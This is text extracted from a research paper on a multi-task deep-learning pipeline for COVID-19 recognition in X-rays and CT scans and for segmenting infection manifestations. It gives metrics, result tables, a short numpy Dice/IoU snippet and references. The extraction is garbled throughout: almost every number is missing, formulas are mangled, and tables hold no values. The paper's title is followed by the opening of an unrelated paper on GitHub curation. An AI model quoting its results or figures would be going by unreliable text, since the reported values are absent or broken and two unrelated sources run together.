x-rays and ct scans, ( ) multi-label recognition of covid- manifestations in ct scans, and ( ) and segmentation of covid- manifestations in ct scans. we adopted the most commonly used performance metrics in the respective areas, that is, for classification and segmentation, which are: sensitivity, specificity, accuracy, precision, f -score, dice coefficient (dsc), intersection over union (iou), and matthews el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ correlation coefficient (mcc). the mathematical expressions for computing the aforementioned metrics are are given by: accuracy ¼ tp þ tn tp þ tn þ fp þ fn ; ( ) senstivity ¼ tp tp þ fn ; ( ) specificity ¼ tn tn þ fp ; ( ) precision ¼ tp tp þ fp ; ( ) mcc ¼ ðtp � tnÞ � ðfn � fpÞffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi ðtp þ fnÞ � ðtn þ fpÞ � ðtp þ fpÞ � ðtn þ fnÞ p ; ( ) f ‐score ¼ � precision:recall precision þ precision ; ( ) dsc ¼ a t bj j aj j þ bj j ; ( ) figure the modified xception model (chen et al., ) which is used as the backbone (feature extractor) for the deeplab-v + model in the segmentation stage of the proposed pipeline. full-size doi: . /peerj-cs. /fig- el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ iou ¼ tp tp þ fp þ fn ; ( ) where tp, fp, fn, and tn are the number of true positives, false positives, false negatives, and true negatives, respectively. for the segmentation task, our training set contains , covid- images and the test set has images. for the classification task, however, the training set contains the , images, and images are included in the test set. for the two-class version of the classification problem, that is, covid- vs. normal, the total number of training images are , , and images are included in the test set. train-test split was used for the evaluation in the three tasks. in the rest of this section, we refer to the covid- classification of stage as task , to the multi-label recognition problem of stage as task , and the segmentation problem of stage as task . results of task : classification using a fine-tuned inception-v model for fine-tuning the inception-v model, we used a batch size of for , steps/ iterations. starting from a pre-trained model on imagenet, we removed the weights of the last layer and re-trained it using x-ray and ct scans. for the four-class version of the recognition problem, that is, covid- , normal, viral pneumonia, and bacterial pneumonia, the number of output nodes that is equal to the number of the classes is set to . for the two-class version of the recognition problem, that is, covid- and normal, the number of output nodes is set to . the last layer of the model was trained with the back-propagation algorithm, and the weight parameter is adjusted using the cross-entropy cost function by calculating the error between the softmax layer output and the specified sample class label vector. table summarizes the results of the fine-tuned inception-v model using . learning rate on the two-class and the four-class problems. after , steps for classes, we achieved an accuracy of . %, . %, and . % for the training, validation and testing, respectively. for classes, however, we achieved an accuracy of . %, . %, and . % for the training, validation and testing respectively. the confusion matrices of the two- class and four-class cases are shown in figs. a and b respectively. we also show the variations of the accuracy and cross-entropy for that model for classification of classes in fig. . we also compared the performance of the adopted model with other models in the recent literature. 
table presents a summary of the accuracy, sensitivity, specificity, precision, f -score and mcc attained by different architectures. we demonstrate that the transfer learning approach with inception-v surpassed all other architectures by table classification results of the fine-tuned inception-v model for the two-class and the four-class covid- recognition problems. please see text for more details. # of classes training accuracy (%) validation accuracy (%) test accuracy (%) training cross entropy validation cross entropy classes . . . . . classes . . . . . el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ achieving a . % accuracy in case the training was done using x-rays only. we further tried to train using multi-modal data, that is, using x-rays and ct scans, and we achieved a . % accuracy. we argue that the increase in the attained accuracy, using figure the variation of accuracy and cross-entropy using the inception-v model with -classes x-ray dataset. (a) the variation of accuracy. (b) the variation of cross-entropy. full-size doi: . /peerj-cs. /fig- figure confusion matrices of the fine-tuned inception-v model for the two-class and the four- class covid- recognition problems. (a) confusion matrix for two classes, (b) confusion matrix for four classes. full-size doi: . /peerj-cs. /fig- el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ multi-modal data, is due to the d cues that are provided by, and inherently exist, in ct scans, but are missing in x-rays. it is worth mentioning that in order to avoid imbalanced data, we made sure that we have an equal number of x-rays and ct scans when we trained with multi-modal data. particularly, we under-sampled the x-rays so that we get a number equal to the number of available ct scans. the under-sampling was done randomly, and we report the results that corresponds to the average of runs. complete results for each of the runs are given in table . it is worth mentioning that due to the limited number of available ct scans, uni-modal learning (using x-rays only) was carried out using a larger number of scans, yet multi-modal learning attained a slightly higher accuracy— . % for the former vs. . % for the latter. we report this comparison to highlight that multi-modal learning is worth further exploration when larger number of ct scans becomes available. table comparing the recognition performance of the proposed model with other models in the recent literature. method modality accuracy (%) senstivity (%) specificty (%) precision (%) f -score (%) fpr mcc (%) -classes alexnet (loey, smarandache & khalifa, ) x-ray . . – . . – – resnet (loey, smarandache & khalifa, ) x-ray . . – . . – – shufflenet + svm (sethy & behera, ) x-ray . . – – . . – googlenet (loey, smarandache & khalifa, ) x-ray . . – . . – – cnn (zhao et al., ) ct . . – . . – – inception-v + svm (sethy & behera, ) x-ray . . – – . . – densenet + svm (sethy & behera, ) x-ray . . – – . . – xceptionnet + svm (sethy & behera, ) x-ray . . – – . . – vgg- + svm (sethy & behera, ) x-ray . . – – . . – inceptionresnetv + svm (sethy & behera, ) x-ray . . – – . . – ours tl-incep-v x-ray . . . . . – -classes dre-net (song et al., ) ct . . . densenet ct . . . . . – – vgg- ct . . . . . . . resnet- ct . . . . . . . googlenet ct . . . . . . . ozkaya, ozturk & barstugan ( ) ct . 
. . . . . . mobilenet v x-ray . . . – – – – vgg x-ray . . . – – – – ours tl-incep-v x-ray . . . . . . . ours tl-incep-v ct + x-ray . . . . . . . el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ results of task : multi-label classification of infection manifestations in ct scans in the multi-label classifier, each convolutional layer is followed by maxpooling and dropout regularization of % to prevent the model from over-fitting. we used × filter for convolution and × for maxpooling, then, a flattening operation is carried out for classification. the activation function is elu for all the layers, except for the last one which is a sigmoid, in order to generate a probability for each label—ground glass, consolidation, and pleural effusion. the loss function is the binary cross-entropy and the metric is the accuracy, with adam as the optimizer (kingma & ba, ). the model was trained for epochs. figure shows the confusion matrix for the three labels in the table the prediction performance for the five runs which were carried out on two-class, multi-modal data (x-ray and ct scans). test no accuracy (%) senstivity (%) specificity (%) precision (%) f -score (%) fpr mcc test- . . . . . . test- . . . . . . test- . . . . . . test- . . . . . . test- . . . . . . . mean . . . . . . . figure the confusion matrix of the adopted multi-label classifier. full-size doi: . /peerj-cs. /fig- el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ covid- dataset. more performance metrics are given in table . it is worth mentioning that we do not report a comparison between our performance at this stage and the recent literature. this is because, to the best of our knowledge, this research is the first to address the problem of recognizing different types of infection manifestations. even for the recently proposed multi-task model in amyar, modzelewski & ruan ( ), its recognition arm addressed binary classification, which is identical to the two-class problem addressed by stage of our pipeline. the segmentation stage in amyar, modzelewski & ruan ( ) did not address multi-label infection recognition either, as it was limited to produce binary masks. results of task : semantic segmentation of covid- infection manifestations using multiple specialized streams as mentioned in the previous section, we initialized the deeplab-v + model using the weights of the checkpoint used to segment the lung cancer nodules in our previous work (el-bana, al-kabbany & sharkas, ). we set the learning rate to . , the momentum to . , the weight decay to . , and the steps to , . we also adjusted the atrous rates as [ , , ] with an output stride of . in fig. , we present the output segmentation masks on the covid- validation set. the figure shows the segmentation output of each of the specialized streams, and the output of the all-class stream, that is, the single stream that was trained to segment all the classes of manifestations at the same time. to support subjective results with objective measures, we report in table the dice coefficient (dsc) and the mean intersection over union (iou) attained by the all-class stream, each of the three specialized streams, and their average. 
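for reference, the dsc and iou values reported for the segmentation streams can be computed directly from predicted and ground-truth binary masks; the following is a minimal numpy sketch in which the array shapes and class labels are illustrative.

```python
import numpy as np

def dice_and_iou(pred, target, eps=1e-7):
    # pred, target: binary numpy arrays of the same shape (e.g., h x w masks)
    pred = pred.astype(bool)
    target = target.astype(bool)
    intersection = np.logical_and(pred, target).sum()
    union = np.logical_or(pred, target).sum()
    dsc = 2.0 * intersection / (pred.sum() + target.sum() + eps)
    iou = intersection / (union + eps)
    return dsc, iou

# per-manifestation scores for a multi-class mask with illustrative labels 1, 2, 3
# scores = [dice_and_iou(pred_mask == c, gt_mask == c) for c in (1, 2, 3)]
```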
considering the performance of the specialized streams, which outperformed the single stream approach, we believe that this defines an accuracy-complexity trade-off, that is, in order to attain better dsc and iou, the system needs to include multiple specialized streams. we also believe that given the covid- pandemic management as an application, in which significant resources have already been invested, there is a higher priority for developing highly accurate systems over low-complexity systems. to compare the performance of the proposed approach with other models, we report the results for specific types of infection manifestations as well as the overall performance for all types of manifestations. table shows a manifestation-specific comparison between the performance of our model, namely, deeplab-v + model with transfer learning from pulmonary nodule detection, and other models from the recent literature table different performance metrics for the adopted multi-label classifier. we show the perfor- mance for individual labels as well as the overall performance. class name accuracy (%) precision (%) senstivity (%) f -score (%) pleural effusion . ground glass . consolidation . overall . . . el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ including previous research that adopted deeplab-v +. the comparison highlights the superiority of our approach consistently for the two types of manifestations. this represents approximately % and % increase in dcs of ground-glass opacities and consolidation, respectively, compared to the recent literature. for miou, the figure the output segmentation masks of the adopted deep models. the images in column from (a) to (c) show the chest ct images of three scans. column from (d) to (f) shows the ground-truth masks for these three scans, where the white represents the consolidation, dark gray represents pleural effusion and light gray corresponds to ground-glass opacities. column from (g) to (i) depicts the segmentation results generated by our model for all classes where the red represents the consolidation, the green represents the pleural effusion, and the yellow represents the ground-glass opacities. the images in columns , , and from (j) to (r) represent the output from the specialized stream that are trained to segment ground-glass opacities, pleural effusion, and the consolidation, respectively. full-size doi: . /peerj-cs. /fig- table a comparison between the performance of each of the specialized streams as well as the all-class stream, with regards to dice coefficient (dsc) and mean intersection over union (miou). for all the streams, a deeplab-v + model, with an xception as a feature extractor, is used. all-class stream : pe stream : ggo stream : consolidation multi-stream average dsc (%) . . . . . miou (%) . . . . . el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ comparison yields an increase of approximately % and % in dcs of ground-glass opacities and consolidation, respectively. we further make a comparison that is not manifestation-specific, between the performance of the proposed approach and the recent literature. in table , we demonstrate an increase of approximately . % and . % for mean intersection-over- union (miou) and dice coefficient, respectively, compared to the recent literature. 
figure depicts a subjective comparison using examples for the output segmentation table a quantitative comparison on the covid- segmentation dataset between our segmentation method and other methods in the recent literature. the comparison considers dsc and miou. it also considers the overall performance on the three different types of infection manifes- tations, that is, it is not a manifestation-specific comparison. method dsc (%) miou (%) u-net + dl (zhou, canu & ruan, ) . . u-net + ftl (zhou, canu & ruan, ) . . u-net × (amyar, modzelewski & ruan, ) . . au-net + dl (zhou, canu & ruan, ) . . u-net × (amyar, modzelewski & ruan, ) . . au-net + ftl (zhou, canu & ruan, ) . . backbone + ppd + ra + ea (fan et al., ) . . jcs (wu et al., ) . . jcs‘ (wu et al., ) . . amine (amyar, modzelewski & ruan, ) . . u-net (chen, yao & zhang, ) . m–a (chen, yao & zhang, ) . m–r (chen, yao & zhang, ) . ours method . . table a quantitative comparison of manifestation-specific dsc and miou, for ground-glass opacity and consolidation, between our segmented method and other methods in the recent literature. method dsc miou ground-glass opacities deeplabv + (stride = ) (fan et al., ) . . deeplabv + (stride = ) (fan et al., ) . . fcn s (fan et al., ) . . semi-inf-net+fcn s (fan et al., ) . . ours (deeplab-v + + exception- ) . . consolidation deeplabv + (stride = ) (fan et al., ) . . deeplabv + (stride = ) (fan et al., ) . . fcn s (fan et al., ) . . semi-inf-net+fcn s (fan et al., ) . . ours (deeplab-v + + exception- ) . . el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ masks on the covid- validation set obtained using u-net (chen, yao & zhang, ) and deeplab-v + (ours). we also demonstrate less computational cost than the traditional test, the rt-pcr, and other diagnostic tools (huang et al., ; wu et al., ). we report this comparison in table , which shows a % reduction in diagnosis/computational time per case. table summarizes the model hyper-parameters used in the three tasks that are accomplished by the proposed system. figure segmentation output visualization results. (a) and (b) chest ct images of two scans. (c) and (d) ground-truth masks for these two scans, where the white represents the consolidation, dark gray represents pleural effusion and light gray corresponds to ground-glass opa- cities. (e) and (f) the outputs of the u-net. (g) and (h) the segmentation results generated by our model. full-size doi: . /peerj-cs. /fig- table a summary of hyper-parameters used in the proposed model. task_no steps/epochs learning rate optimizer momentum dropout weight decay batch size task , steps . gradient descent – – – task epochs . adam – . – task k steps . sgd . – . table a comparison between the proposed method and other diagnostic tools in the literature concerning the average diagnosis time per case. method (won et al., ) (huang et al., ) (wu et al., ) ours test time h . min s . s el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ conclusion in this research, we proposed a multi-task pipeline for the recognition of covid- , and the classification and segmentation of related infection manifestations in medical scans. we are inspired by the emerging role that medical imaging-based diagnostics can play as a digital second opinion to manage the current pandemic. the proposed pipeline starts with a covid- recognition stage. 
towards this goal, we fine-tuned an inception-v model that was pre-trained on imagenet. we evaluated the performance of this model on two tasks, namely, the two-class problem of covid- /non-covid- recognition, and the four-class problem of recognizing covid- scans among scans that correspond to normal, viral pneumonia, and bacterial pneumonia cases. we outperformed other techniques in the recent literature, consistently in both types of classification problems. to the best of our knowledge, we are also the first to highlight a potential advantage for multi-modal learning, that is, learning from x-rays and ct scans over learning from x-rays only. in the second stage, we addressed a problem that had not been addressed by the recent literature, namely, estimating the probabilities of presence of different types of infection manifestations in medical scans. this stage was implemented using a multi-label cnn classifier, and we envisage its potential to serve in the early detection of infection manifestations. it also complements the third stage, which addresses the problem of computing binary masks that segment the infection regions in ct scans. for effective segmentation, we adapted knowledge from another domain, namely, pulmonary nodule segmentation. this approach resulted in an increase of approximately . % and . % for dice coefficient and mean intersection-over-union (miou), respectively, while requiring % less computational time, compared to the recent literature. all the stages of the proposed pipeline were trained and tested using widely adopted datasets and evaluated using various objective measures. we also used data augmentation techniques to avoid over-fitting that might have occurred due to the relatively limited volume of available data. for further enhancement of the performance of the segmentation stage, we showed that using multiple streams, such that each stream is trained to segment a specific type of infection manifestation, can significantly improve the quality of the output masks as measured by the dsc and miou.

additional information and declarations

funding
the authors received no funding for this work.

competing interests
shimaa el-bana and maha sharkas declare that they have no competing interests. ahmad al-kabbany is the founder of vrapeutic, and is currently serving as a member of the research & development department's team.

author contributions
• shimaa el-bana conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
• ahmad al-kabbany conceived and designed the experiments, performed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft.
• maha sharkas conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft.

data availability
the following information was supplied regarding data availability: dataset and scripts are available at github: https://github.com/shimaaelbana/classification-and-segmentation-of-infection-manifestations-in-covid- -scans. the datasets acquired for analysis are available at: . covid- ct segmentation dataset: http://medicalsegmentation.com/covid /?
fbclid=iwar uzz f mbhhvf hmhs oq lmoxq ydmxboc lkkzyl h envf u_fup. . the covid- image data collection repository on github: https://github.com/ ieee /covid-chestxray-dataset. . the rsna pneumonia detection challenge dataset: https://www.kaggle.com/c/rsna- pneumonia-detection-challenge. references ai t, yang z, hou h, zhan c, chen c, lv w, tao q, sun z, xia l. . correlation of chest ct and rt-pcr testing in coronavirus disease (covid- ) in china: a report of cases. radiology ( ): doi . /radiol. . amyar a, modzelewski r, ruan s. . multi-task deep learning based ct imaging analysis for covid- : classification and segmentation. medrxiv doi . / . . . . chan jf-w, yuan s, kok k-h, to kk-w, chu h, yang j, xing f, liu j, yip cc-y, poon rw-s, tsoi h-w, lo sk-f, chan k-h, poon vk-m, chan w-m, ip jd, cai j-p, cheng vc-c, chen h, hui ck-m, yuen k-y. . a familial cluster of pneumonia associated with the novel coronavirus indicating person-to-person transmission: a study of a family cluster. lancet ( ): – doi . /s - ( ) - . chen d, jiang x, hong y, wen z, wei s, peng g, wei x. . can chest ct features distinguish patients with negative from those with positive initial rt-pcr results for coronavirus disease (covid- )? american journal of roentgenology : – doi . /ajr. . . chen g, li c, wei w, jing w, woźniak m, blažauskas t, damaševičius r. . fully convolutional neural network with augmented atrous spatial pyramid pool and fully connected fusion path for high resolution remote sensing image segmentation. applied sciences ( ): . chen l-c, papandreou g, schroff f, adam h. . rethinking atrous convolution for semantic image segmentation. available at https://arxiv.org/abs/ . . el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/shimaaelbana/classification-and-segmentation-of-infection-manifestations-in-covid- -scans https://github.com/shimaaelbana/classification-and-segmentation-of-infection-manifestations-in-covid- -scans http://medicalsegmentation.com/covid /?fbclid&#x d;iwar uzz f mbhhvf hmhs oq lmoxq ydmxboc lkkzyl h envfu_fup http://medicalsegmentation.com/covid /?fbclid&#x d;iwar uzz f mbhhvf hmhs oq lmoxq ydmxboc lkkzyl h envfu_fup http://medicalsegmentation.com/covid /?fbclid&#x d;iwar uzz f mbhhvf hmhs oq lmoxq ydmxboc lkkzyl h envfu_fup https://github.com/ieee /covid-chestxray-dataset https://github.com/ieee /covid-chestxray-dataset https://www.kaggle.com/c/rsna-pneumonia-detection-challenge https://www.kaggle.com/c/rsna-pneumonia-detection-challenge http://dx.doi.org/ . /radiol. http://dx.doi.org/ . / . . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /ajr. . https://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ chen l-c, zhu y, papandreou g, schroff f, adam h. . encoder-decoder with atrous separable convolution for semantic image segmentation. in: proceedings of the european conference on computer vision (eccv), new york: springer international publishing, – . chen x, yao l, zhang y. . residual attention u-net for automated multi-class segmentation of covid- chest ct images. available at https://arxiv.org/abs/ . . chollet f. . xception: deep learning with depthwise separable convolutions. in: proceedings of the ieee conference on computer vision and pattern recognition, piscataway: ieee, – . chu dkw, pan y, cheng sms, hui kpy, krishnan p, liu y, ng dym, wan ckc, yang p, wang q, peiris m, poon llm. . molecular diagnosis of a novel coronavirus ( -ncov) causing an outbreak of pneumonia. clinical chemistry ( ): – doi . 
/clinchem/hvaa . Çiçek Ö, abdulkadir a, lienkamp ss, brox t, ronneberger o. . d u-net: learning dense volumetric segmentation from sparse annotation. in: international conference on medical image computing and computer-assisted intervention, berlin: springer, – . cohen jp, morrison p, dao l. . covid- image data collection. available at https://arxiv.org/ abs/ . . coronaviridae study group of the international committee on taxonomy of viruses. . the species severe acute respiratory syndrome-related coronavirus: classifying -ncov and naming it sars-cov- . nature microbiology : . el-bana s, al-kabbany a, sharkas m. . a two-stage framework for automated malignant pulmonary nodule detection in ct scans. diagnostics ( ): doi . /diagnostics . elharrouss o, subramanian n, al-maadeed s. . an encoder-decoder-based method for covid- lung infection segmentation. available at https://arxiv.org/abs/ . . fan d-p, zhou t, ji g-p, zhou y, chen g, fu h, shen j, shao l. . inf-net: automatic covid- lung infection segmentation from ct scans. medrxiv doi . / . . . . fang y, zhang h, xie j, lin m, ying l, pang p, ji w. . sensitivity of chest ct for covid- : comparison to rt-pcr. radiology ( ): doi . /radiol. . he j-l, luo l, luo z-d, lyu j-x, ng m-y, shen x-p, wen z. . diagnostic performance between ct and initial real-time rt-pcr for clinically suspected coronavirus disease (covid- ) patients outside wuhan, china. respiratory medicine : . hope md, raptis ca, shah a, hammer mm, henry ts. . a role for ct in covid- ? what data really tell us so far. lancet ( ): – doi . /s - ( ) - . huang z, zhao s, li z, chen w, zhao l, deng l, song b. . the battle against coronavirus disease (covid- ): emergency management and infection control in a radiology department. journal of the american college of radiology ( ): – doi . /j.jacr. . . . kingma dp, ba j. . adam: a method for stochastic optimization. available at https://arxiv.org/ pdf/ . . koonsanit k, thongvigitmanee s, pongnapang n, thajchayapong p. . image enhancement on digital x-ray images using n-clahe. in: th biomedical engineering international conference (bmeicon), piscataway: ieee, – . lai c-c, shih t-p, ko w-c, tang h-j, hsueh p-r. . severe acute respiratory syndrome coronavirus (sars-cov- ) and corona virus disease- (covid- ): the epidemic and the challenges. international journal of antimicrobial agents : . el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://arxiv.org/abs/ . http://dx.doi.org/ . /clinchem/hvaa https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://dx.doi.org/ . /diagnostics https://arxiv.org/abs/ . http://dx.doi.org/ . / . . . http://dx.doi.org/ . /radiol. http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.jacr. . . https://arxiv.org/pdf/ . https://arxiv.org/pdf/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ li k, fang y, li w, pan c, qin p, zhong y, liu x, huang m, liao y, li s. a. ct image visual quantitative evaluation and clinical classification of coronavirus disease (covid- ). european radiology ( ): – doi . /s - - - . li q, guan x, wu p, wang x, zhou l, tong y, ren r, leung ksm, lau ehy, wong jy, xing x, xiang n, wu y, li c, chen q, li d, liu t, zhao j, liu m, tu w, chen c, jin l, yang r, wang q, zhou s, wang r, liu h, luo y, liu y, shao g, li h, tao z, yang y, deng z, liu b, ma z, zhang y, shi g, lam tty, wu jt, gao gf, cowling bj, yang b, leung gm, feng z. b. early transmission dynamics in wuhan, china, of novel coronavirus—infected pneumonia. new england journal of medicine ( ): – doi . 
/nejmoa . liu x, faes l, kale au, wagner sk, fu dj, bruynseels a, mahendiran t, moraes g, shamdas m, kern c, ledsam jr, schmid mk, balaskas k, topol ej, bachmann lm, keane pa, denniston ak. . a comparison of deep learning performance against health-care professionals in detecting diseases from medical imaging: a systematic review and meta-analysis. lancet digital health ( ):e –e doi . /s - ( ) - . loey m, smarandache fm, khalifa ne. . within the lack of chest covid- x-ray dataset: a novel detection model based on gan and deep transfer learning. symmetry ( ): doi . /sym . mahdianpari m, salehi b, rezaee m, mohammadimanesh f, zhang y. . very deep convolutional neural networks for complex land cover mapping using multispectral remote sensing imagery. remote sensing ( ): doi . /rs . narin a, kaya c, pamuk z. . automatic detection of coronavirus disease (covid- ) using x-ray images and deep convolutional neural networks. available at https://arxiv.org/abs/ . . nasrullah n, sang j, alam ms, mateen m, cai b, hu h. . automated lung nodule detection and classification using deep learning combined with multiple strategies. sensors ( ): doi . /s . ozkaya u, ozturk s, barstugan m. . coronavirus (covid- ) classification using deep features fusion and ranking technique. available at https://arxiv.org/abs/ . . patel bn, rosenberg l, willcox g, baltaxe d, lyons m, irvin j, rajpurkar p, rajpurkar t, gupta r, halabi s, langlotz c, lo e, mammarappallil j, mariano aj, riley g, seekins j, shen l, zucker e, lungren mp. . human-machine partnership with artificial intelligence for chest radiograph diagnosis. npj digital medicine ( ): – doi . /s - - - . perez f, vasconcelos c, avila s, valle e. . data augmentation for skin lesion analysis. in: or . context-aware operating theaters, computer assisted robotic endoscopy, clinical image-based procedures, and skin image analysis. berlin: springer, – . polat h, danaei mehr h. . classification of pulmonary ct images by using hybrid d-deep convolutional neural network architecture. applied sciences ( ): doi . /app . ronneberger o, fischer p, brox t. . u-net: convolutional networks for biomedical image segmentation. in: international conference on medical image computing and computer-assisted intervention. berlin: springer, – . sethy pk, behera sk. . detection of coronavirus disease (covid- ) based on deep features. international journal of mathematical, engineering and management sciences ( ): – doi . /ijmems. . . . . sharfstein jm, becker sj, mello mm. . diagnostic testing for the novel coronavirus. jama ( ): doi . /jama. . . el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /nejmoa http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /sym http://dx.doi.org/ . /rs https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://dx.doi.org/ . /s https://arxiv.org/abs/ . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /app http://dx.doi.org/ . /ijmems. . . . http://dx.doi.org/ . /jama. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ shen j, zhang cj, jiang b, chen j, song j, liu z, he z, wong sy, fang p-h, ming w-k. . artificial intelligence versus clinicians in disease diagnosis: systematic review. jmir medical informatics ( ):e doi . / . simonyan k, zisserman a. . two-stream convolutional networks for action recognition in videos. in: advances in neural information processing systems. – . 
song y, zheng s, li l, zhang x, zhang x, huang z, chen j, zhao h, jie y, wang r, chong y, shen j, zha y, yang y. . deep learning enables accurate diagnosis of novel coronavirus (covid- ) with ct images. medrxiv doi . / . . . . szegedy c, vanhoucke v, ioffe s, shlens j, wojna z. . rethinking the inception architecture for computer vision. in: proceedings of the ieee conference on computer vision and pattern recognition. – . tahamtan a, ardebili a. . real-time rt-pcr in covid- detection: issues affecting the results. expert review of molecular diagnostics ( ): – doi . / . . . wang d, hu b, hu c, zhu f, liu x, zhang j, wang b, xiang h, cheng z, xiong y, zhao y, li y, wang x, peng z. . clinical characteristics of hospitalized patients with novel coronavirus-infected pneumonia in wuhan, china. jama ( ): – doi . /jama. . . wang l, wong a. . covid-net: a tailored deep convolutional neural network design for detection of covid- cases from chest radiography images. available at https://arxiv.org/abs/ . . won j, lee s, park m, kim ty, park mg, choi by, kim d, chang h, kim vn, lee cj. . development of a laboratory-safe and low-cost detection protocol for sars-cov- of the coronavirus disease (covid- ). molecular cell ( ): – doi . /j.molcel. . . . wu jt, leung k, leung gm. . nowcasting and forecasting the potential domestic and international spread of the -ncov outbreak originating in wuhan, china: a modelling study. lancet ( ): – doi . /s - ( ) - . wu y-h, gao s-h, mei j, xu j, fan d-p, zhao c-w, cheng m-m. . jcs: an explainable covid- diagnosis system by joint classification and segmentation. available at https://arxiv.org/abs/ . . xia x, xu c, nan b. . inception-v for flower classification. in: nd international conference on image, vision and computing (icivc). piscataway: ieee, – . ye z, zhang y, wang y, huang z, song b. . chest ct manifestations of new coronavirus disease (covid- ): a pictorial review. european radiology ( ): – doi . /s - - - . zhang b, wang l, wang z, qiao y, wang h. . real-time action recognition with enhanced motion vector cnns. in: proceedings of the ieee conference on computer vision and pattern recognition. – . zhao j, zhang y, he x, xie p. . covid-ct-dataset: a ct scan dataset about covid- . available at https://arxiv.org/abs/ . . zheng c, deng x, fu q, zhou q, feng j, ma h, liu w, wang x. . deep learning-based detection for covid- from chest ct using weak label. medrxiv doi . /tmi. . . zhou t, canu s, ruan s. . an automatic covid- ct segmentation based on u-net with attention mechanism. available at https://arxiv.org/abs/ . . el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / http://dx.doi.org/ . / . . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /jama. . https://arxiv.org/abs/ . http://dx.doi.org/ . /j.molcel. . . http://dx.doi.org/ . /s - ( ) - https://arxiv.org/abs/ . http://dx.doi.org/ . /s - - - https://arxiv.org/abs/ . http://dx.doi.org/ . /tmi. . https://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ zhou z, siddiquee mmr, tajbakhsh n, liang j. . unet++: redesigning skip connections to exploit multiscale features in image segmentation. ieee transactions on medical imaging : – doi . /tmi. . . zu zy, jiang md, xu pp, chen w, ni qq, lu gm, zhang lj. . coronavirus disease (covid- ): a perspective from china. radiology ( ): doi . /radiol. . zuiderveld k. . graphics gems iv: contrast limited adaptive histogram equalization. cambridge: academic press professional, inc., – . el-bana et al. 
a multi-task pipeline with specialized streams for classification and segmentation of infection manifestations in covid- scans

submitted april , accepted september , published october . corresponding author: yu wu, yuw @psu.edu. academic editor: philipp leitner. additional information and declarations can be found on page . doi . /peerj-cs. copyright wu et al.
distributed under creative commons cc-by . open access the appropriation of github for curation yu wu , na wang , jessica kropczynski and john m. carroll information sciences and technology, pennsylvania state university, university park, pa, united states of america samsung research america, mountain view, ca, united states of america school of information technology, university of cincinnati, cincinnati, oh, united states of america abstract github is a widely used online collaborative software development environment. in this paper, we describe curation projects as a new category of github project that collects, evaluates, and preserves resources for software developers. we investigate: ( ) what motivates software developers to curate resources; ( ) why curation has occurred on github; ( ) how curated resources are used by software developers; and ( ) how the github platform could better support these practices. we conduct in- depth interviews with software developers, each of whom hosts curation projects on github. our results suggest that the motivators that inspire software developers to curate resources on github are similar to those that motivate them to participate in the development of open source projects. convenient tools (e.g., markdown syntax and git version control system) and the opportunity to address professional needs of a large number of peers attract developers to engage in curation projects on github. benefits of curating on github include learning opportunities, support for development work, and professional interaction. however, curation is limited by github’s document structure, format, and a lack of key features, such as search. in light of this, we propose design possibilities to encourage and improve appropriations of github for curation. subjects human-computer interaction, software engineering keywords curation, github, appropriation introduction github is a collaborative coding environment that employs social media features. it encourages software developers to perform collaborative software development by offering distributed version control and source code management services with social features (i.e., user profiles, comments, and broadcasting activity traces) (dabbish et al., ). this web-based tool has attracted notable attention from both industry and academic communities. by the end of , software developers hosted over . million repositories on github (marlow, dabbish & herbsleb, ). it has not only topped the list of preferred software hosting and collaboration services among developers (doll, ), but also inspired a number of researchers to investigate how its features have supported software development practices (dabbish et al., ; marlow, dabbish & herbsleb, ; singer et al., ). these prior studies have concluded that software developers make social inferences and collaborate with each other using github social features (i.e., activity traces how to cite this article wu et al. 